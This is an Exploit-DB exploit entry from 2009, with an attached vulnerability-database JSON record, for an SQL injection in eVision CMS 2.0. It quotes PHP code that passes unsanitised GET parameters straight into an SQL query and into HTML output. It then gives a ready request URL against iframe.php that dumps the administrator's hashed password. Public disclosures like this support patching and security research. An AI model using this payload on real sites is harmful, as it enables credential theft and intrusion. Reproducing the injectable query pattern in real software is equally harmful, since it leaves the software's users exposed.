ID EDB-ID:7933
Type exploitdb
Reporter darkjoker
Modified 2009-01-30T00:00:00
Description
eVision CMS <= 2.0 (field) SQL Injection Vulnerability. Webapps exploit for php platform
--+++============================================================+++--
--+++====== eVision CMS <= 2.0 SQL Injection Vulnerability ======+++--
--+++============================================================+++--
[+] Author : darkjoker
[+] Site : http://darkjoker.net23.net
[+] Download: http://kent.dl.sourceforge.net/sourceforge/e-vision/eVision-2.0.tar.gz
[+] Vulnerable code:
67 $sql = "SELECT `".$_GET['field']."` FROM ".$_GET['module']." WHERE `id".$_GET['module']."`='".$_GET['id']."'";
68 $result = mysql_query($sql);
69 $row = mysql_fetch_array($result);
70
71 if ( isset($_GET['div']) ) { $div = 'class="'.$_GET['div'].'"'; }
72 else { $div = ''; }
73 if ( isset($_GET['font']) ) { $font = 'class="'.$_GET['font'].'"'; }
74 else { $font = ''; }
75
76 echo '
77 <html '.$div.'>
78 <head>
79 <meta http-equiv="Content-Type" content="text/html; charset='.$charset.'">
80 <link rel="stylesheet" type="text/css" href="'.$path.'style.php?template='.$template.'&module='.$_GET['module'].'">
81 </head>
82 <body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0" '.$font.'>'.set_text($row[$_GET['field']]).'</body>
83 </html>
84 ';
[+] It prints admin's password (hashed):
[+] /iframe.php?field=pass&module=users&id=1
# milw0rm.com [2009-01-30]
{"id": "EDB-ID:7933", "hash": "b69140da3ead727775051e0bb5c03d2d", "type": "exploitdb", "bulletinFamily": "exploit", "title": "eVision CMS <= 2.0 field SQL Injection Vulnerability", "description": "eVision CMS <= 2.0 (field) SQL Injection Vulnerability. Webapps exploit for php platform", "published": "2009-01-30T00:00:00", "modified": "2009-01-30T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/7933/", "reporter": "darkjoker", "references": [], "cvelist": [], "lastseen": "2016-02-01T04:22:25", "history": [], "viewCount": 8, "enchantments": {"score": {"value": 0.6, "vector": "NONE", "modified": "2016-02-01T04:22:25"}, "dependencies": {"references": [], "modified": "2016-02-01T04:22:25"}, "vulnersScore": 0.6}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/7933/", "sourceData": "--+++============================================================+++--\n--+++====== eVision CMS <= 2.0 SQL Injection Vulnerability ======+++--\n--+++============================================================+++--\n\n[+] Author : darkjoker\n[+] Site : http://darkjoker.net23.net\n[+] Download: http://kent.dl.sourceforge.net/sourceforge/e-vision/eVision-2.0.tar.gz\n\n[+] Vulnerable code:\n\n 67 $sql = \"SELECT `\".$_GET['field'].\"` FROM \".$_GET['module'].\" WHERE `id\".$_GET['module'].\"`='\".$_GET['id'].\"'\";\n 68 $result = mysql_query($sql);\n 69 $row = mysql_fetch_array($result);\n 70\n 71 if ( isset($_GET['div']) ) { $div = 'class=\"'.$_GET['div'].'\"'; }\n 72 else { $div = ''; }\n 73 if ( isset($_GET['font']) ) { $font = 'class=\"'.$_GET['font'].'\"'; }\n 74 else { $font = ''; }\n 75\n 76 echo '\n 77 <html '.$div.'>\n 78 <head>\n 79 <meta http-equiv=\"Content-Type\" content=\"text/html; charset='.$charset.'\">\n 80 <link rel=\"stylesheet\" type=\"text/css\" href=\"'.$path.'style.php?template='.$template.'&module='.$_GET['module'].'\">\n 81 </head>\n 82 <body marginwidth=\"0\" marginheight=\"0\" topmargin=\"0\" leftmargin=\"0\" '.$font.'>'.set_text($row[$_GET['field']]).'</body>\n 83 </html>\n 84 ';\n\n\n[+] It prints admin's password (hashed):\n\n[+] /iframe.php?field=pass&module=users&id=1\n\n# milw0rm.com [2009-01-30]\n", "osvdbidlist": [], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{}